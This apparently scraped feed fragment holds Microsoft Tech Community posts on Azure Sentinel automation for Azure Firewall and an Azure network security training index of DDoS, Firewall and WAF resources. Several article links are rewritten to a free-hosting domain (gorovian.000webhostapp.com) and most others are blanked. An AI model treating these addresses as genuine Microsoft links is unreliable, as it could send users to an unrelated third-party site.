</STRONG>under the <STRONG>Configuration </STRONG>node</FONT></LI> <LI><FONT size="4">Click on <STRONG>Rule templates </STRONG>tab and filter <STRONG>Data Sources </STRONG>to Azure Firewall.&nbsp; This will show all the <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958" target="_blank" rel="noopener">built-in Analytic Rule templates for Azure Firewall</A></FONT></LI> <LI><FONT size="4">Select one of the rules and create an Analytic Rule for Azure Firewall</FONT> <UL> <LI><FONT size="4">Alternately, you could also use a custom rule that you have created for testing</FONT> <UL> <LI><FONT size="4"><STRONG><EM>Note</EM></STRONG><EM>: The Analytic Rule must be one which generates alerts/creates incidents with an IP address (IP entity)</EM></FONT></LI> </UL> </LI> </UL> </LI> </OL> <OL start="4"> <LI><FONT size="4">Once the rule is created and active, click on the <STRONG>Automation</STRONG> node</FONT></LI> <LI><FONT size="4">In the Automation blade, click <STRONG>Create </STRONG><STRONG>à Add new rule</STRONG></FONT></LI> <LI><FONT size="4">In the <STRONG>Create new automation rule </STRONG>blade, provide a name for your automation rule</FONT></LI> <LI><FONT size="4">Observe that the <STRONG>Trigger </STRONG>is preset to <EM>When incident is created</EM></FONT></LI> <LI><FONT size="4">Under <STRONG>Conditions</STRONG>, select <EM>If Analytic rule name</EM><STRONG> Contains </STRONG>&lt;name of the rule you created in step 3&gt;</FONT></LI> <LI><FONT size="4">Under <STRONG>Actions</STRONG>, select <STRONG>Run Playbook</STRONG> and then select one of the Firewall playbooks you have deployed</FONT></LI> <LI><FONT size="4">Add <STRONG>Rule expiration </STRONG>date or time (default is indefinite) and value for <STRONG>Order </STRONG>(in which rule should be processed)</FONT></LI> <LI><FONT size="4">Click <STRONG>Apply </STRONG>to enable the rule</FONT></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="CreateAnalyticandAutomationRules3.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/286203iA66AA639C71922CB/image-size/large?v=v2&amp;px=999" role="button" title="CreateAnalyticandAutomationRules3.gif" alt="Creating Sentinel Analytic and Automation Rules" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Creating Sentinel Analytic and Automation Rules</span></span></P> <P>&nbsp;</P> <P><FONT size="4">Now that the Automation rule has been created and is enabled, when the condition defined in the Analytic Rule is met, Azure Sentinel will trigger the playbook attached to the Automation rule.&nbsp; This will send you an adaptive notification card in the Team Channel you have specified in the configuration.&nbsp; You can then click on the different options available in the Teams adaptive card to make changes to the target IP Groups, TI allow list or the Network Rule Collections.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">For testing the playbook workflow, you could create a custom Analytic Rule and then generate the traffic to trigger the playbooks.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6">Summary</FONT></H2> <H2>&nbsp;</H2> <P><FONT size="4">Azure Firewall logs can help identify patterns of malicious activity in your network.&nbsp; Azure Firewall Connector and Playbook templates can help expedite SOC triage with Teams notification and rapid mitigation with on-click response/remediation in case of threat detections.&nbsp; We encourage all customers to utilize these new automation capabilities to help improve your overall security posture.</FONT></P> <P>&nbsp;</P> <P><FONT size="4">You can also contribute new connectors, playbooks, detections, workbooks, analytics and more for Azure Firewall in Azure Sentinel. Get started now by joining the <A href="#" target="_blank" rel="noopener">Azure Network Security</A> plus <A href="#" target="_blank" rel="noopener">Azure Sentinel Threat Hunters</A> communities on GitHub and following the guidance.</FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT size="6"><SPAN>Additional Resources</SPAN></FONT></H2> <H2>&nbsp;</H2> <UL> <LI><FONT size="4">To learn more about Azure Firewall, visit:&nbsp; <A href="#" target="_blank" rel="noopener">https://aka.ms/AzNetSecNinja</A></FONT></LI> <LI><FONT size="4">To learn more about Azure Sentinel, visit:&nbsp; <A href="#" target="_blank" rel="noopener">http://aka.ms/ninjatraining</A></FONT></LI> <LI><FONT size="4">To learn more about Automation Rules and Playbooks, visit:</FONT> <UL class="lia-list-style-type-circle"> <LI><FONT size="4"><A href="#" target="_blank" rel="noopener">Automate incident handling in Azure Sentinel</A></FONT></LI> <LI><FONT size="4"><A href="#" target="_blank" rel="noopener">Automate threat response with playbooks in Azure Sentinel</A></FONT></LI> <LI><FONT size="4"><A href="#" target="_blank" rel="noopener">Tutorial: Use playbooks with automation rules in Azure Sentinel</A></FONT></LI> </UL> </LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> Thu, 03 Jun 2021 23:40:04 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224 Mohit_Kumar 2021-06-03T23:40:04Z Azure Network Security Ninja Training https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-ninja-training/ba-p/2356101 <P><STRONG>Last updated on October 6, 2021</STRONG></P> <P>&nbsp;</P> <P>In this blog post, we will walk you through basic to advanced scenarios for Azure network security. Ready to become an Azure NetSec ninja? Dive right in!</P> <P>&nbsp;</P> <P>Check back here routinely, as we will keep updating this blog post with new content as it becomes available.</P> <P>&nbsp;</P> <P>Anything in here that could be improved or may be missing? Let us know in the comments below, we’re looking forward to hearing from you.</P> <P>&nbsp;</P> <TABLE> <TBODY> <TR style="background-color: cee2fc;"> <TD style="text-align: center;"><SPAN style="font-size: x-large;"><STRONG>Highlight of the Month:&nbsp;<A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746" target="_self">Azure Firewall Solution for Azure Sentinel: New Detections, Hunting Queries and Response Automation</A></STRONG></SPAN></TD> </TR> <TR style="background-color: e9ecf0;"> <TD style="background-color: e9ecf0;"> <P style="text-align: justify;">The Azure Firewall Solution provides new threat detections, hunting queries, a new firewall workbook and response automation as packaged content. This enables you to find the appropriate solution easily and then deploy all the components in the solution in a single step from the Solutions blade in Azure Sentinel.</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="NetSecNinjaTable.png" style="width: 931px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/280793i7050D6B0333E752D/image-size/large?v=v2&amp;px=999" role="button" title="NetSecNinjaTable.png" alt="Azure Network Security Ninja Training Sections" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure Network Security Ninja Training Sections</span></span></P> <H1>1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; The Basics</H1> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">1.1&nbsp;&nbsp;&nbsp;&nbsp; Introduction to network security concepts</SPAN></H2> <P>&nbsp;</P> <P>This module introduces general concepts of network and web application security.</P> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.1.1&nbsp;&nbsp;&nbsp; Network security in Azure</SPAN></H3> <P style="padding-left: 30px;">Be familiar with network security concepts and ways you can achieve a secure network deployment in the Azure cloud.</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Network security and containment in Azure</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Secure and govern workloads with network level segmentation</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Best practices for network security</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.1.2&nbsp;&nbsp;&nbsp; Web application protection in Azure</SPAN></H3> <P style="padding-left: 30px;">Be familiar with web application protection concepts and ways you can achieve a secure web application deployment in the Azure cloud.</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Best practices for secure PaaS deployments</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">N-tier architecture style</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <H2><SPAN style="color: #000080;">1.2&nbsp;&nbsp;&nbsp;&nbsp; Introduction to Azure network security products</SPAN></H2> <P>&nbsp;</P> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Introduction to Azure Network Security</A> (50 minutes) webinar, which covers all products listed individually below. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck</A>.&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.2.1&nbsp;&nbsp;&nbsp; Azure DDoS Protection Standard</SPAN></H3> <P style="padding-left: 30px;">Azure DDoS Protection Standard, combined with application design best practices, provides enhanced DDoS mitigation features to defend against DDoS attacks.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard documentation</A>.</P> </BLOCKQUOTE> <P style="padding-left: 30px;"><STRONG>MS Learn Training Material:&nbsp;</STRONG><A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard</A> (35 minutes)</P> <P style="padding-left: 30px;">This MS Learn module will show you how to guard your Azure services from a denial-of-service attack using Azure DDoS Protection Standard.</P> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.2.2&nbsp;&nbsp;&nbsp; Azure Firewall and Azure Firewall Manager</SPAN></H3> <P style="padding-left: 30px;">Azure Firewall is a managed, cloud-based network security service that protects your Azure Virtual Network resources. It's a fully stateful firewall as a service with built-in high availability and unrestricted cloud scalability.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure Firewall documentation</A>.&nbsp;</P> </BLOCKQUOTE> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;">Azure Firewall Manager is a security management service that provides central security policy and route management for cloud-based security perimeters.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure Firewall Manager documentation</A>.</P> </BLOCKQUOTE> <P style="padding-left: 30px;"><STRONG>MS Learn Training Material:&nbsp;</STRONG><A href="#" target="_blank" rel="noopener">Azure Firewall and Azure Firewall Manager</A> (40 minutes)</P> <P style="padding-left: 30px;">This MS Learn module will describe how Azure Firewall protects Azure Virtual Network resources, including the Azure Firewall features, rules, deployment options, and administration with Azure Firewall Manager.</P> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">1.2.3&nbsp;&nbsp;&nbsp; Azure Web Application Firewall (WAF)</SPAN></H3> <P style="padding-left: 30px;">Web Application Firewall (WAF) provides centralized protection of your web applications from common exploits and vulnerabilities. You can deploy WAF on Azure Application Gateway or WAF on Azure Front Door.</P> <P style="padding-left: 30px;">&nbsp;</P> <BLOCKQUOTE> <P style="padding-left: 30px;">For more information, check the <A href="#" target="_blank" rel="noopener">Azure Web Application Firewall (WAF) documentation</A>.</P> </BLOCKQUOTE> <P style="padding-left: 30px;"><STRONG>MS Learn Training Material:&nbsp;</STRONG><A href="#" target="_blank" rel="noopener">Azure Web Application Firewall (WAF)</A> (40 minutes)</P> <P style="padding-left: 30px;">This MS Learn module will show how Azure Web Application Firewall protects Azure web applications from&nbsp;common&nbsp;attacks, including its features, how it’s deployed, and its common use cases.</P> <P style="padding-left: 30px;">&nbsp;</P> <H1>2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Architecture and Deployments</H1> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">2.1&nbsp;&nbsp;&nbsp;&nbsp; Standalone Deployments</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.1.1&nbsp;&nbsp;&nbsp; Azure DDoS Protection Standard</SPAN></H3> <P style="padding-left: 30px;">When deploying Azure DDoS Protection Standard, keep in mind that public IPs in ARM-based VNETs are currently the only type of protected resource. PaaS services (multitenant) are not supported for Azure DDoS Protection Standard SKU at this time. For these services, the default DDoS Protection Basic SKU applies.</P> <P style="padding-left: 30px;">The main steps to deploy Azure DDoS Protection Standard are:</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Create a DDoS protection plan</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Attach vNETs to the DDoS protection plan</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure DDoS logging</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Enable diagnostic settings on Public IP Address resources</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Getting started with Azure Distributed Denial of Service&nbsp;(DDoS) Protection</A> (60 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;&nbsp;&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.1.2&nbsp;&nbsp;&nbsp; Azure Firewall</SPAN></H3> <P style="padding-left: 30px;">You can choose to deploy Azure Firewall Standard SKU or Azure Firewall Premium SKU (currently in Public Preview). Check the documentation below to get an understanding of their feature differences:</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Standard - Features</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Premium - Features</A></LI> </UL> <P style="padding-left: 30px;">During your planning stages, it’s also a good idea to refer to the known issues for these products. Being aware of these known issues will save you time and stress when deploying your Azure Firewall.</P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Standard - Known Issues</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall Premium - Known Issues</A></LI> </UL> <P>&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Deploy and configure Azure Firewall using the Azure portal </STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy and configure Azure Firewall using the Azure portal</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Azure Firewall logs and metrics </STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall logs and metrics</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Monitor Azure Firewall logs and metrics</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Overview of Azure Firewall logs and metrics</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Integrate Azure Firewall with Azure Standard Load Balancer</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Integrate Azure Firewall with Azure Standard Load Balancer</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Use Azure Firewall to protect Azure Kubernetes Service (AKS) Deployments</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Use Azure Firewall to protect Azure Kubernetes Service (AKS) Deployments</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Restrict egress traffic in Azure Kubernetes Service (AKS)</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Azure Firewall DNS settings</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall DNS settings</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Enabling DNS proxy in your Azure Firewall will allow you to use FQDN filtering in network rules</A></LI> <LI style="padding-left: 30px;"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331" target="_blank" rel="noopener">Enabling Central Visibility For DNS Using Azure Firewall Custom DNS and DNS Proxy</A></LI> </UL> <P style="padding-left: 30px;">&nbsp;</P> <P style="padding-left: 30px;"><STRONG>Azure Firewall in forced tunneling mode</STRONG></P> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Firewall in forced tunneling mode</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Manage application and network connectivity with Azure Firewall</A> (50 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A></P> <P>&nbsp;</P> <P data-unlink="true">You can also check out this&nbsp;<A href="#" target="_self">Azure Firewall Deep Dive</A>&nbsp;on Youtube (82 minutes). It covers almost everything you need to know!</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.1.1&nbsp;&nbsp;&nbsp; Azure Web Application Firewall (WAF)</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Create a WAF Policy on Azure Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Create a WAF Policy on Azure Front Door</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure WAF logging for an Application Gateway deployment</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure WAF logging for a Front Door deployment</A></LI> <LI style="padding-left: 30px;"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-web-application-firewall-waf-config-versus-waf-policy/ba-p/2270525" target="_blank" rel="noopener">Azure Web Application Firewall: WAF config versus WAF policy</A></LI> </UL> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">2.2&nbsp;&nbsp;&nbsp;&nbsp; Advanced Deployments</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.1&nbsp;&nbsp;&nbsp; On-Prem Hybrid</SPAN></H3> <UL> <LI style="padding-left: 30px;">Deploy and configure Azure Firewall in a hybrid network <A href="#" target="_blank" rel="noopener">via Azure Portal</A> or <A href="#" target="_blank" rel="noopener">via PowerShell</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy network virtual appliances (NVAs) for high availability in Azure</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Implement a secure hybrid</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.2&nbsp;&nbsp;&nbsp; vWAN (Secured Virtual Hub)</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Introduction to Azure Virtual WAN</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">What are the Azure Firewall Manager architecture options?</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure Virtual WAN FAQs</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">How does the virtual hub in a virtual WAN select the best path for a route from multiple hubs?</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure Azure Firewall in a VWAN hub</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Convert a VWAN to a Secure Hub</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Secure your VirtualHub with Azure Firewall Manager</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Migrate to Virtual WAN</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.3&nbsp;&nbsp;&nbsp; vWAN (Secured Virtual Hub) with 3<SUP>rd</SUP> party SECCaaS</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">VWAN hub partners</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy a security partner provider</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Deploy Check Point CloudGuard Connect as a trusted Azure security partner</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.4&nbsp;&nbsp;&nbsp; Hub and Spoke</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Hub and spoke network topology </A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Hub-spoke network topology in with Azure Firewall </A></LI> <LI style="padding-left: 30px;"><A href="https://gorovian.000webhostapp.com/?exam=t5/fasttrack-for-azure/using-azure-firewall-as-a-network-virtual-appliance-nva/ba-p/1972934" target="_blank" rel="noopener">Using Azure Firewall as a Network Virtual Appliance (NVA)</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.5&nbsp;&nbsp;&nbsp; Forced Tunneling with 3<SUP>rd</SUP> party NVAs</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Forced tunneling configuration.</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Validated VPN devices</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.6&nbsp;&nbsp;&nbsp; Multi-product combination in Azure</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Combine Azure Firewall with other Network security products.</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Determine how best to combine App Gateway and Azure Frontdoor</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.7&nbsp;&nbsp;&nbsp; TLS Inspection on Azure Firewall</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Enable TLS inspection in Azure firewall</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Learn about URL filtering and Web Categories</A></LI> <LI style="padding-left: 30px;"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/certificate-management-overview-for-azure-firewall-premium-tls/ba-p/2214763" target="_blank" rel="noopener">Certificate Management Overview for Azure Firewall Premium TLS Inspection</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Content Inspection Using TLS Termination with Azure Firewall Premium</A> (50 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">2.2.8&nbsp;&nbsp;&nbsp; Per-Site or Per-URI WAF policies on Azure Application Gateway</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Configure Per-Site WAF policies</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Apply Per-URI policy</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Using Azure WAF Policies to Protect Your Web Application at Different Association Levels</A> (50 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;</P> </BLOCKQUOTE> <H1>&nbsp;</H1> <H1>3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Operations</H1> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">3.1&nbsp;&nbsp;&nbsp;&nbsp; Centralized Management</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.1.1&nbsp;&nbsp;&nbsp; Azure Firewall Manager and Firewall Policy</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Use Azure Firewall policy to define a rule hierarchy</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Getting started with Azure Firewall Manager</A> (35 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the Azure Firewall Manager presentation deck</A>.&nbsp;</P> </BLOCKQUOTE> <H3 style="padding-left: 30px;">&nbsp;</H3> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.1.2&nbsp;&nbsp;&nbsp; Web Application Firewall (WAF) Policy</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Migrate from WAF Config to WAF Policy</A></LI> </UL> <P>&nbsp;</P> <H2><SPAN style="color: #000080;">3.2&nbsp;&nbsp;&nbsp;&nbsp; Optimizing</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.2.1&nbsp;&nbsp;&nbsp; Web Application Firewall (WAF) tuning</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Troubleshooting and tuning for Azure WAF for Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Troubleshooting and tuning for Azure WAF for Front Door</A></LI> </UL> <BLOCKQUOTE> <P>Do you prefer videos? Check out the <A href="#" target="_blank" rel="noopener">Boosting your Azure Web Application (WAF) deployment</A> (45 minutes) webinar. You can also quickly browse through the <A href="#" target="_blank" rel="noopener">contents of the presentation deck.</A>&nbsp;</P> </BLOCKQUOTE> <H2>&nbsp;</H2> <H2><SPAN style="color: #000080;">3.3&nbsp;&nbsp;&nbsp;&nbsp; Governance</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.3.1&nbsp;&nbsp;&nbsp; Built-in Azure Policies for Azure DDoS Protection Standard</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard should be enabled</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Public IP addresses should have resource logs enabled for Azure DDoS Protection Standard</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Virtual networks should be protected by Azure DDoS Protection Standard</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.3.2&nbsp;&nbsp;&nbsp; Built-in Azure Policies for Azure Web Application Firewall (WAF)</SPAN></H3> <UL> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should be enabled for Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should be enabled for Azure Front Door Service service</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should use the specified mode for Application Gateway</A></LI> <LI style="padding-left: 30px;"><A href="#" target="_blank" rel="noopener">Web Application Firewall (WAF) should use the specified mode for Azure Front Door Service</A></LI> </UL> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.3.3&nbsp;&nbsp;&nbsp; Restrict creation of Azure DDoS Protection Standard plans with Azure Policy</SPAN></H3> <P style="padding-left: 30px;">If you are looking to prevent unplanned or unapproved costs associated with the creation of multiple DDoS plans within the same tenant, <A href="#" target="_blank" rel="noopener">check out this Azure Policy template</A>. This policy denies the creation of Azure DDoS Protection Standard plans on any subscriptions, except for the ones defined as allowed.</P> <P style="padding-left: 30px;">&nbsp;</P> <H2><SPAN style="color: #000080;">3.4&nbsp;&nbsp;&nbsp;&nbsp; Responding</SPAN></H2> <P>&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.4.1&nbsp;&nbsp;&nbsp; Azure Web Application Firewall (WAF)</SPAN></H3> <P style="padding-left: 30px;">This <A href="#" target="_blank" rel="noopener">Logic App Playbook</A> for Sentinel will add the source IP address passed from the Sentinel Incident to a custom WAF rule blocking the IP. For a more comprehensive description of this use case, check our blog post <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306" target="_blank" rel="noopener">Integrating Azure Web Application Firewall with Azure Sentinel</A>.</P> <P style="padding-left: 30px;">&nbsp;</P> <H3 style="padding-left: 30px;"><SPAN style="color: #3366ff;">3.4.2&nbsp;&nbsp;&nbsp; Azure DDoS Protection Standard</SPAN></H3> <P style="padding-left: 30px;">During an active access, Azure DDoS Protection Standard customers have access to the <A href="#" target="_blank" rel="noopener">DDoS Rapid Response (DRR)</A> team, who can help with attack investigation during an attack and post-attack analysis.</P> <P style="padding-left: 30px;">This <A href="#" target="_blank" rel="noopener">DDoS Mitigation Alert Enrichment</A> template will alert administrators of a DDoS event, while adding essential information in the body of the email for a more detailed notification.</P> <P>&nbsp;</P> <H1>4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Integrations</H1> <P>&nbsp;</P> <P><STRONG>Using Azure Sentinel with Azure Web Application Firewall</STRONG></P> <P>You can <A href="#" target="_blank" rel="noopener">integrate Azure WAF with Azure Sentinel</A> for security information event management (SIEM). By doing this, you can use Azure Sentinel’s security analytics, playbooks and workbooks with your WAF’s log data.</P> <P>In <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/integrating-azure-web-application-firewall-with-azure-sentinel/ba-p/1720306" target="_blank" rel="noopener">this blog post</A>, we cover in further detail how to configure the log connector, query logs, generate incidents, and automate responses to incidents.</P> <P>&nbsp;</P> <P><STRONG>Using Azure Sentinel Solutions for Azure Firewall</STRONG></P> <P>The Azure Firewall Solution provides new threat detections, hunting queries, a new firewall workbook and response 